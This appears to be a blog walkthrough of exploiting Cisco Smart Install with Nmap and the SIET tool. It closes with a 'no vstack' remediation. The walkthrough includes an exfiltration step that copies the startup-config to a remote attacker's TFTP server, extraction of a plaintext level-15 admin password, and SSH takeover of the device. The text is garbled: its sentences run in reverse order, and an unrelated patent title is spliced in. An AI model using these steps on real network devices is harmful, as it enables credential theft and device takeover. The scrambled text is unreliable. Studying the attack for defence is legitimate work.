![]() The remediation efforts are minimal compared to the recovery efforts in the event this is remotely exploited.US20050238050A1 - System and method for a dynamic protocol framework This is one of the many different attacks that can be performed on Cisco devices and very common in modern networks. Confirm that this configuration applied successfully by issuing: “show vstack status”.In global configuration mode on your Cisco device, issue the command: “no vstack”.Q: How can this attack be prevented in modern networks?Ī: This attack can be prevented by performing the following: This information confirms that we are now remotely connected to the remote Cisco device and have full device takeover. Let’s confirm this by viewing the Spanning Tree Protocol topology information. Let’s try and SSH into this Cisco device with this newly obtained information:Īs you can see, we have successfully established an SSH connection to the remote device and have fully compromised the device. From our port scan performed earlier, we noticed that both SSH and Telnet were opened on the remote device. ![]() Privilege level 15 in Cisco IOS is the equivalent of “root” in Linux or “NT\Authority System” in Windows. We can now view the startup-config and view this information:Īs seen in the startup-config, we have a local “admin” account with a plaintext password with privilege level 15. SIET will spin up a TFTP server on the local attacking machine and the device running Smart Install (once exploited), will run: “copy startup-config tftp (remote attacker IP)” the following screenshot demonstrates this: This information in the startup-config is plentiful with useful information including, password hashes, local usernames and passwords (plaintext or hashes), and network topology information such as: VLANs, trunk links, etc. Let’s proceed with exploiting this misconfiguration.īy using SIET, we can obtain the startup-config (configuration of Cisco IOS device in NVRAM vs running-config which is in RAM). With the information at hand, we can now confirm that the remote device is indeed running Smart Install. Let’s confirm with using SIET if this remote device is indeed running Smart Install: One common tool is call SIET (Smart Install Exploitation Tool). Many tools have been created for Smart Install exploitation. How can we confirm that this remote device is indeed running Smart Install? Let’s confirm if Smart Install is running on this remote device.įrom this information, we have reason to believe that this remote device is indeed running Smart Install. We first begin by performing a remote port scan within the network as seen below using a port scanner such as Nmap:įrom the following OS fingerprint from Nmap, the remote device appears to be a Cisco device. ![]() The following demo demonstrates abusing Smart Install and common tools/techniques seen in modern networks. This exposed service can lead to remote, unauthenticated attackers/threat actors to utilize this service and obtain sensitive information such as: the running-config, password hashes or plaintext passwords, and network topology information or even full device takeover. However, many network administrators and engineers alike do not disable this service when the deployment is finished. One common best practice across the information technology field is to disable unnecessary services or disable these services when no longer needed. This protocol is very useful for networking professionals for rapid deployment of new infrastructure. Smart Install runs on TCP port 4786 and requires no authentication to connect to the remote service. This can include devices such as switches and routers and many other devices running Cisco IOS. developed a widely used protocol to perform zero touch deployment of new infrastructure.
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |